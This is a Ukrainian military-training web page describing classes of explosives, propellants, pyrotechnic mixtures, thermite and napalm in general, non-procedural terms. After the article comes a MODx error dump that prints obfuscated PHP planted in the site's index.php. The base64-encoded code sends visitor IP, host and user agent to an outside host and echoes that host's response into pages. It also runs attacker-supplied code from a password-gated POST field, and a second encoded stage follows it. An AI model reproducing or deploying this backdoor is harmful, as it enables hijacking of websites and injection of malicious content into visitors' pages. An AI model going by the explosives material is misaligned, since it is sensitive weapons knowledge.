Ініціюючі вибухові речовини

Український легіон » Дисципліни » Авіаційні засоби ураження » Ініціюючі вибухові речовини

Ініціюючі вибухові речовини

Ініціюючі вибухові речовини відрізняються підвищеною чутливістю до змін параметрів навколишнього середовища. Розглянемо основних представників цього класу.

Гримуча ртуть (фульминат ртуті Mg (ONC)) - є сіллю гримучої кислоти.

Вперше отримана в 1799 році. Практично застосовується з 1815 року.  Являє собою мілкокристалеву сипучу речовину з щільністю 4,31 г/см. Вона отрутна, погано розчиняється у воді (холодної і гарячий). По чутливості до удару, тертю, і тепловому впливу перевершує інші ініціюючі ВР.

 При вологості 10 % - не детонує, тільки горить. При вологості 30% - не горить. Енергійно реагує з алюмінієм, не взаємодіє з міддю і її сплавами.  Зберігається у вологому стані, звичайно під водою. Застосовується в капсулях-запалювачах і капсулях-детонаторах.

Азид свинцю (Pb(N)) - сіль азотисто-водневої кислоти.

Вперше отримана в 1890-1891 роках, застосовується з 1907 року.   Являє собою мілкокристалеву речовину з щільністю 4,8 г/см , слабко розчиняється у воді.  До удару, тертю і дії вогню в 2-3 рази менш чуттєва, чим гримуча ртуть.

Застосовується в капсулях-детонаторах і в шнурах, що детонують.

ТНРС (тринитрорезорцинат свинцю чи стифнат свинцю CH(NO),((Opb)HO)- свинцева сіль стифнинової кислоти.

ТНРС отриманий у 1908 році, застосовується з 1914 року.  Являє собою мілкокристалеву не сипучу речовину з щільністю 2,9 г/см, незначно розчиняється у воді.  Чутливість до удару нижче, ніж в азиду свинцю і гримучої ртуті. Чуттєвий до теплового впливу, під впливом прямого сонячного світла він сутеніє і розкладається. Чуттєвий до електричних розрядів. З металами не взаємодіє.

 ТНРС не має самостійного застосування, а використовується в деяких типах капсулів - детонаторів для надійного ініціювання азиду свинцю, а так само у запалювальних складах піропатронів.

Тетразен - кристалічна речовина.

Відрізняється високою чутливістю до променя вогню й удару. Ініціююча здатність низька. Застосовується тетразен у накольних сумішах капсулів детонаторів як добавки до азиду свинцю, у капсулях-запалювачах замість гримучої ртуті.

Капсульні суміші, використовувані для спорядження капсулів-запалювачей, являють собою механічні суміші деяких речовин, найбільш розповсюдженими з яких є гримуча ртуть, бертолетова сіль і сурма.

 Під дією удару чи наколу капсуля-запалювача відбувається запалення  капсульної суміші утворенням променю вогню, здатного запалити порох чи викликати детонацію ініціюючого ВР.

 Бризантні вибухові речовини

Бризантні ВР менш чуттєві до початкового імпульсу і застосовуються як спорядження в АЗУ. Розглянемо основні бризантні ВР.

Тротил (тринітротолуол, тол, ТНТ).

Тротил вперше отриманий у 1863 році, у якості ВР застосовується з 1902 року.  Є основною бризантною ВР. Являє собою кристалічну речовину ясно-жовтого кольору. Практично не розчинний у воді. Добре плавиться без розкладання. До удару, тертю і тепловому впливу малочутливий.  З металами не взаємодіє.  Сприйнятливість тротилу до детонації залежить від його стану. Застосовується для спорядження більшості АЗУ.

Тетрил (тринитрофенилметилпитроамін CH(NO)N(CHNO).

Тетрил кристалічна речовина яскраво-жовтого кольору. Негігроскопічна і нерозчинима у воді, плавиться без розкладання.  З металами не взаємодіє. Застосовується для виготовлення проміжних детонаторів у різних боєприпасах і для спорядження деяких типів капсулів-детонаторів.

Гексоген (циклотриметилентринитрамін CHON).

Гексоген - мілкокристалічне речовина білого кольору. Отримано в 1897 році.  Негігроскопічен, у воді не розчиняється. З металами не взаємодіє. На практиці застосовується з добавкою невеликої кількості флегматизатора (сплав парафіну з церезином). У чистому виді гексоген застосовується тільки для спорядження капсулів-детонаторів.

Октоген (циклотетрамнтилентетранитроамін)

Октоген - кристалічна речовина білого кольору. Відрізняється високою термостійкістю, витримуючи без вибуху нагрів при температурі до 2009 С у плині 5-8 годин. У чистому вигляді не використовується. Застосовується для виготовлення термостійких додаткових детонаторів, електродетонаторів і як основний компонент у деяких могутніх термостійких вибухових складах.

ТЕН (тетранитропентаетрит)

ТЕН - біла кристалічна, негігроскопична і нерозчинна у воді речовина. З металами не взаємодіє.  У чистому виді застосовується для виготовлення шнурів, що детонують, і спорядження капсулів-детонаторів.

ТГ (сплав тротилу і гексогена)

ТГ- 20, ТГ- 40 - число вказує зміст тротилу.

ТГА (сплав тротилу, гексогена й алюмінію).

Відрізняється меншою швидкістю детонації в порівнянні з ТГ, однак має підвищену фугасність.

ТГ і ТГА застосовуються як спорядження боєприпасів.

 

СУМІШІ

Аммоніти - містять як основний компонент амонійну селітру. Пальними речовинами є бризантні ВР. При запалюванні аммоніти загоряються з працею, горіння супроводжується шипінням і кіптявою. Аммоніти застосовуються для спорядження деяких типів боєприпасів.

Динаміти - вибухової суміші нітрогліцерину з інертними порошкоподібними чи студенистими речовинами, що зменшують їхню чутливість. В даний час динаміти не застосовуються внаслідок їхньої високої небезпеки в роботі.

Оксиліквіти - суміші пальних речовин з рідким киснем (деревне вугілля, деревне борошно, обпилювання, торф і ін.) Мають велику теплоту вибуху, однак відрізняються низькою стійкістю.  Застосовуються в промисловості.

Рідкі вибухові суміші - являють собою розчини рідких чи твердих пальних у рідких окислювачах.

Газоподібні вибухові суміші - суміш хмари аерозолю рідкого палива з киснем повітря. Хмара аерозолей створюється за допомогою спеціальних розривних зарядів із бризантних ВР. Як рідкі палива використовується суміш метилацетилена і пропану з добавкою бутану і нафтопродуктів. (Сформована хмара газоподібної вибухової суміші детонується за допомогою спеціальних гранат чи детонаторів, що входять до складу боєприпасів). Об'ємний вибух є більш ефективним, чим вибух зосередженого заряду.

 

ПЛАСТИЧНІ ВР

Пластит-4

Пластит - 4 однорідна тістоподібна маса. Виготовляється з порошкоподібного гексогена і спеціального пластифікатора шляхом ретельного їхнього перемішування. Не гігроскопічен і не розчинний, легко деформується зусиллям рук. Пластичні властивості зберігаються при температурі від-30 до +50 С. З металами не взаємодіє.

 

Порохи

Основне застосування порохів - твердотопливні ракетні двигуни і спорядження артилерійських патронів. Розрізняють два класи порохів:

 • нитроцеллюлозні порохи;
 • сумішові порохи.

Нітроцеллюлозні порохи (бездимні чи колоїдні)

 Основним їхнім компонентом є нітрати целюлози, розчинники, стабілізатори, флегматизатори,  добавки, що гасять полум’я,  технологічні добавки й ін. Як розчинники використовуються:

 • спиртоефірова суміш і ацетон;
 • нітрогліцерин;
 • тротил.

Розрізняють нітроцеллюлозні порохи наступних типів:

 • піроксилінові;
 • баллістити;
 • кордити;
 • емульсійні порохи;
 • порохи без розчинника.

Нітроксилинові  порохи - застосовуються для зарядів патронів вогнепальної зброї.

Баллістити - для виготовлення зарядів РДТТ.

Кордити- порохи на змішаному розчиннику. Використовуються як порохи для стрілецької зброї, мінометів і знарядь.

Емульсійні порохи - виходять шляхом обробки нітратів целюлози емульсією змішаних розчинників у воді.  Застосовуються для спорядження патронів стрілецької зброї.

Порохи  без розчинника - нітрати здрібненого  пергаменту чи віскозної нитки. Застосовуються в мінометах і стрілецькій зброї.

З усіх типів нітроцеллюлозних порохів найбільше застосування знайшли піроксилінові і нітроглициринові порохи.

 

Сумішові порохи

До сумішових порохів відносяться:

 • димний (чорний чи рушничний) порох;
 • амонійний порох;
 • ракетні порохи.

Димний порох - механічна суміш калієвої селітри, деревного вугілля і сірки. Застосовується в різного роду запалювачах і сповільнювачах, у вишибних зарядах, підсилювачах вогню й вогнепроводних шнурах.

Амонійний порох - складається з амонійної селітри і вугілля. Володіє низькою фізичною стійкістю. Застосовується як добавки до звичайного димного пороху.

Ракетні сумішові порохи - новий вид твердих палив для ракет.  Представляє суміш мінерального окислювача й органічного пального.

 

Піротехнічні склади

 Піротехнічними називаються речовини і суміші, що дають при горінні світлові, теплові, димові чи звукові ефекти.

Розглянемо основні піротехнічні речовини.

Освітлювальні склади - суміш пального (алюміній, магній), окислювача, цементатора і полум'яних добавок.

Фотоосвітлювальні склади - за структурою близькі до освітлювальних складів, однак ініціювання їх відбувається під дією детонаційного імпульсу.

Сигнальні склади - різновид освітлювальних, відрізняються наявністю барвників полум'я.

Трасуючі  -  за складом близькі до сигнального.

Димові  -  у якості основного складу застососуються білий фосфор. Використовуються для постановки димових завіс.

Імітаційні склади - складаються з розривних зарядів, освітлювальних і димоутворюючих складів.

Запальні склади- складаються з термітів, електронів, органічних пальних речовин, а також різних перехідних запалювальних і самозаймистих складів.

Терміт

Терміт - механічна суміш пального металу й окислювача - оксиду металу. Горить без доступу кисню (може горіти під водою, розвиваючи температуру до 2500 С).

 

Електрон

Електрон - сплав алюмінію і магнію, горить за рахунок кисню повітря. Рідкі органічні пальні вогнесуміші (вогневі чи напалмові) - нафта, гас, бензин. Для перетворення грузлих вогнесумішей у рідке пальне додається загущувач у вигляді порошку, що представляє собою алюмінієві солі або суміші органічних кислот.

Напалмові вогнесуміші мають наступні властивості:

 • легку займистість;
 • гарн  прилипаємість;
 • здатність дробитися на дрібні фракції в момент удару тонкостінних боєприпасів об поверхню землі.

Завдяки своїм властивостям напалмові вогнесуміші знайшли широке застосування в бомбардувальних засобах ураження (запальних авіабомбах і запальних баках). 

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0133 s(22 Requests)
  PHP: 0,3658 s 
  Total: 0,3791 s